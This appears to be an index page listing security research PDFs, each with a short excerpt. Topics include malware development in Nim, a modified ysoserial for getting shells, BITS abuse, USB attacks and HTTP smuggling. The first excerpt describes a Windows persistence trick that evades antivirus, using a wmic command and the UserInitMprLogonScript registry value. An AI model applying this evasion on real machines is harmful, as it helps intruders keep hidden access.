权限维持 简介 Logon Scripts是系统的登录脚本,这⾥说⼀个特别⽤法, Logon Scripts能够优先于安全软件执⾏, 绕过安全软件对敏感操作的拦截,本⽂将具体介绍这个技巧。 Logon Scripts⽤法 拦截测试 实际 360 创建会被拦截 wmic ENVIRONMENT create name="AnonySec",username="%username%",VariableValue="Logon Scripts!" 但是 测试 并未拦截 启⽤Logon Scripts 注册表路径:HKCU\Environment 创建字符串键值: UserInitMprLogonScript 键值设置为bat的绝对路径:...
pdf
1 SPARR W: A Novel Covert Communication Scheme Exploiting Broadcast Signals in LTE, 5G & Beyond Reza Soosahabi, Chuck McAuley Application & Threat Intelligence Research Center 2 WHO 3 4 MOTIVATION 5 Motivation • Past research experience in wireless security • Worked with US operators before joining Keysight in 201...
pdf
Internet Kiosk Terminals The Redux Paul Craig – Security-Assessment.com Defcon 19 – Las Vegas  Hello Defcon 19  My name is Paul Craig  I work at Security-Assessment.com as a penetration tester.  I love to hack stuff, its my life, and my profession.  If you have any questions or comments – Please email me...
pdf
1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 1.10 1.11 1.12 1.13 1.14 1.15 1.16 1.17 1.18 1.19 1.20 1.21 TableofContents 引子 第一章BurpSuite安装和环境配置 第二章BurpSuite代理和浏览器设置 第三章如何使用BurpSuite代理 第四章SSL和Proxy高级选项 第五章如何使用BurpTarget 第六章如何使用BurpSpider 第七章如何使用BurpScanner 第八章如何使用BurpIntruder 第九章如何使用BurpRepeater 第十章如何使用BurpSequencer 第十一章如何使用Burp...
pdf
BITSInject Using the BITS service to execute a program in the “NT AUTHORITY/SYSTEM” session. Summary BITS Background Details How We Got There - Research Flow First Naive Try Taking Inspiration From Windows Update Service (wuaueng) Imitating Wuaueng The State File is the Supervisor Interactive or not? Migrat...
pdf
FreeCulture.org Student movement for free culture free speech free software free culture FreeCulture.org, Inc. P.O. Box 140657 Gainesville, FL 32614-0657 U.S.A. freedom@freeculture.org http://freeculture.org/ FreeCulture.org is a non-profit organization dedicated to promoting and facilitating student invol...
pdf
Owning Bad Guys {& Mafia} with JavaScript Botnets Chema Alonso (chema@informatica64.com @chemaalonso) and Manu “The Sur” (mfernandez@informatica64.com) Informatica 64 (http://www.informatica64.com) Abstract: “Man in the middle” attacks are common and dangerous. Using a TOR connection or an Anonymous Proxy Server i...
pdf
1 些malware-dev开源项⽬介绍-nim 项⽬列表 OffensiveNim pop_bin.nim 作⽤ 编译 运⾏ pop_winim_bin.nim 作⽤ 编译 运⾏ pop_winim_lib.nim 作⽤ 编译 运⾏ execute_assembly_bin.nim 作⽤ 编译 运⾏ clr_host_cpp_embed_bin.nim 作⽤ 编译 运⾏ scshell_c_embed_bin.nim 作⽤ 编译 运⾏ fltmc_bin.nim 作⽤ 2 编译 运⾏ blockdlls_acg_ppid_spoof_bin.nim 作⽤ 编译 运⾏ named_pipe_client_bin.nim && nam...
pdf
这次的案件源自于很久以前外部 HC 单位对某司的钓鱼攻击。文章中的源 码是 ASP 版本的钓鱼框架紫缘,但是 ASP 源码中存在越权访问漏洞所以可以才 得以打到攻击者的后台。在同段 IP 的扫描中根据中间件的版权信息可以获取同 类型的钓鱼管理后台。详细内容在后续章节逐一介绍攻破思路和方法。 一、事件背景 企业邮箱收到了仿造 Outlook Web App 界面的钓鱼邮件。应该是想要钓鱼 我们公司员工的邮箱账户。攻击者 Outlook 钓鱼页面: 二、反制过程 渗透测试是红队人员对目标单位的攻击,反制是目标单位的蓝队人员对红 队人员的反向渗透测试。所以把这个反红队过程也叫做反制。反制和渗透测试 一个正常网站没有差别。除了对目标...
pdf
USB Attacks: Fun with Plug and 0wn Defcon 17 Rafael Dominguez Vega 2nd August 2009 A little about me ... 2 rafael.dominguez­vega[at]mwrinfosecurity[dot]com http://labs.mwrinfosecurity.com Main Objectives • Attacks & Impact • Bug Discovery • Driver Exploitation 3 What this talk will cover • USB for fun and profit • Fuz...
pdf
Antivirus Event Analysis Cheat Sheet Version 1.8.1, Florian Roth @cyb3rops! ! Attribute Less Relevant Relevant Highly Relevant Virus Type HTML Iframe Keygen Joke Adware Clickjacking Crypto FakeAV Trojan Backdoor Agent Malware JS Creds PS PowerShell Exploit Ransom PassView Tool-Netcat Tool-N...
pdf
Mobile Application Web API Reconnaissance: Web-to-Mobile Inconsistencies & Vulnerabilities Abner Mendoza, Guofei Gu Texas A&M University abmendoza@tamu.edu, guofei@cse.tamu.edu Abstract—Modern mobile apps use cloud-hosted HTTP-based API services and heavily rely on the Internet infrastructure for data communication and...
pdf
我的CS笔记之- In-memory Evasion 4-5 0x00 前言 In-memory Evasion 4-5其中包含了威胁模拟的介绍,大致意思就是通过修改c2profile模仿真实APT的样 本会产生的特征行为等,也不是百分百模拟,就是模拟了一下yara规则中的静态特征,感兴趣的小伙伴 自行学习,我就不做笔记了。除了威胁模拟,视频中还介绍了cs3.11引入 的一些内存对抗新功能主要是 Module Stomping和cleanup这2个功能。这里不由感叹一句,自从CS被卖了以后的,更换了老大以 后,更新越来越不行了,还开始搞java代码混淆,class完整性校验。多把精力花在怎么进化CS上吧, @Joe Vest @Gr...
pdf
Ericsson's EDACS Trunking http://www.signalharbor.com/ttt/00apr/index.html 1 of 7 6/18/2007 14:07 This article first appeared in the April 2000 issue of Monitoring Times. Ericsson's EDACS Trunking Motorola has several competitors in the trunked public safety radio system marketplace. One popular alternative is the Er...
pdf
An#$Forensics,AF, @dualcoremusic, mov$eax,$0x6b;$int$0x80$ •  Rapper, •  Some,other,stuff,idk, Overview, •  Memory,Forensics,vs,SMC*, – Windows, – Linux, •  Android,(An#$)Forensics, •  Fun,with,SD,cards, Disclaimers, •  !Professional, •  TROLOLOLOL, •  !Expert,/,YMMV, •  DO,ILLEGAL,THINGS, , Memory,Forensics, •  Focus,o...
pdf
ContentsinDetail 1. CoverPage 2. TitlePage 3. CopyrightPage 4. AbouttheAuthors 5. BRIEFCONTENTS 6. CONTENTSINDETAIL 7. FOREWORD 8. ACKNOWLEDGMENTS 9. INTRODUCTION 1. WhoThisBookIsFor 2. WhatThisBookIsn’t 3. WhyUseGoforHacking? 4. WhyYouMightNotLoveGo 5. ChapterOverview 10. 1GOFUNDAMENTALS 1. SettingUpaDevelopmentEnviro...
pdf
Hiding Wookiees in HTTP @regilero HTTP smuggling is a thing we should know better and care about. DEFCON 24 Why wookiees? ● It's all about smugglers, wookiee requests and responses ● Wookiee language is a thing – hard to speak – Easy to misinterpret Outline ● The minimum required on HTTP (Keep-alive, pipelining) ● ...
pdf
源代码安全测试云平台服务商 Secure Your Code Trust Your Software www.haodahengye.com.cn 18910080395 Fortify SCA 支持 Android 源码安全漏洞检测类别 1. Access Control: Android Provider 2. Access Control: Database 3. Android Bad Practices: Missing Broadcaster Permission 4. Android Bad Practices: Missing Receiver Permission 5. Android...
pdf
[ ysuserial ] 某⾏动在即,为助⼒在⼀线防守的伙伴,特发此⾃⽤项⽬,帮助伙伴们更⾼效、更快速的针对 Java 反序列化漏洞进⾏⾃检及安全修复。 本项⽬为 ysoserial [su18] 专版,取名为 ysuserial ,在原项⽬ ysoserial 基础上魔改⽽来,主要有以下新添加功能: 1. 基础链版本的覆盖:原版反序列化链可能仅限于某⼏个版本,本项⽬添加了如 CB/C3P0 等链的低版本,可⼀键 getshell 的版本 覆盖更⼴; 2. 利⽤链的扩充和丰富:在原版基础上添加了多条利⽤链,扩展利⽤⽅式,更够在依赖不确定、利⽤⽅式有限制的情况扩展更多的攻击 路径; 3. 利⽤⽅式的填充:原版的利⽤链的利⽤⽅式仅使⽤...
pdf
软件安全分论坛 自我介绍   ID:仙果   清华大学网络行为研究所    安全研究员   兴华永恒(北京)      高级安全工程师   7年安全工作经验,专注于漏洞分析,漏洞防护   浏览器   用户接入互联网的门户     2015年8月份全球主流浏览器市场份额排行榜   浏览器漏洞攻防的参与者   时间线   *~2008 2009-2010 2011-2012 2013-2014 2015 Win 7 NO_ASLR&堆填充 ActiveX Java Flash Plyaer象混淆 CVE-2011-2110 IE器UAF CVE-2013-2551 CVE-2014-032...
pdf